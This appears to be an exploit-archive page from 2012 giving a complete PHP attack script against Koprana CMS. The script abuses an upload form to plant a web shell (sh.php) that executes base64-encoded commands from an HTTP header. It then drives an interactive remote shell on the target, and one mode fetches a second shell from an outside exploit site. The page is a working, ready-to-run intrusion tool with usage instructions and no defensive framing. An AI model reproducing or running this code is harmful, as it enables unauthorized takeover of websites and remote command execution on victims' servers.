Home / exploits Koprana CMS Shell Upload
Posted on 11 April 2012
<?php //NOTE : - If you are using BHR put this file in exploitswebapp folder // - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only) /* load exploits/webapp/koprana_upload.php set HOST target set PORT Taget_PORT (default : 80) set MODE (1 for backdoor upload/2 for shell upload) set FILE (save format TXT/SQL) exploit !koprana_upload @ HOST = localhost = Target URL @ PORT = 80 = Target Port @ PATH = / = Web site path @ MODE = 1 = Exploit Mode */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $port,$packet) { if (!($sock = fsockopen($host, $port))) die(" [-] No response from {$host}:{$port} "); fputs($sock, $packet); return stream_get_contents($sock); } print " +-----------------------[ The Crazy3D Team ]--------------------------+"; print " | Koprana CMS Remote Upload Exploit |"; print " | by The UnKn0wN |"; print " | Greets to : The Crazy3D members and all Algerian h4x0rs |"; print " +---------------------------------------------------------------------+"; print " | www.Dofus-Exploit.com | WwW.IzzI-Hack.com |"; print " +---------------------------------------------------------------------+ "; if ($argc < 3) { print " Usage......: php $argv[0] <host> <path> <mode> "; print " Example....: php $argv[0] localhost / 1"; print " Example....: php $argv[0] localhost /site/ 2 "; die(); } $host = $argv[1]; $port = $argv[2]; $path = $argv[3]; $mode = $argv[4]; $shell = "<?php error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>"; $shell2 = file_get_contents("http://dofus-exploit.com/exploit/ibiza.txt"); //username : UnKnOwN password : lolilol (You can modify this by your own shell) if($mode == "2") $shell = $shell2; $boundary = "---------".str_replace(".", "", microtime()); $payload = "--{$boundary} "; $payload .= "Content-Disposition: form-data; name="fichier"; filename="sh.php" "; $payload .= "Content-Type: application/x-php "; $payload .= "".$shell." "; $payload .= "--{$boundary} "; $payload .= "Content-Disposition: form-data; name="execute" execute "; $payload .= "--{$boundary} "; $payload .= "Content-Disposition: form-data; name="dossier" ./ "; $payload .= "--{$boundary}-- "; $packet = "POST {$path}index.php?pages=buy1_ontrue HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Content-Type: multipart/form-data; boundary={$boundary} "; $packet .= "Content-Length: ".strlen($payload)." "; $packet .= "Connection: keep-alive {$payload}"; http_send($host,$port, $packet); if($mode == "1") { $packet = "GET {$path}sh.php HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cmd: %s "; $packet .= "Connection: close "; if (!($sock = http_send($host,$port, $packet))) die(" [-] Upload failed! "); print "[+]Backdoor was upload! [+]Getting the shell... "; while(1) { print " BHR@{$host}# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_code_(.*)/s", http_send($host,$port, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die(" [-] Exploit failed! "); } }else print "Go to {$host}{$path}sh.php to check. "; ?>
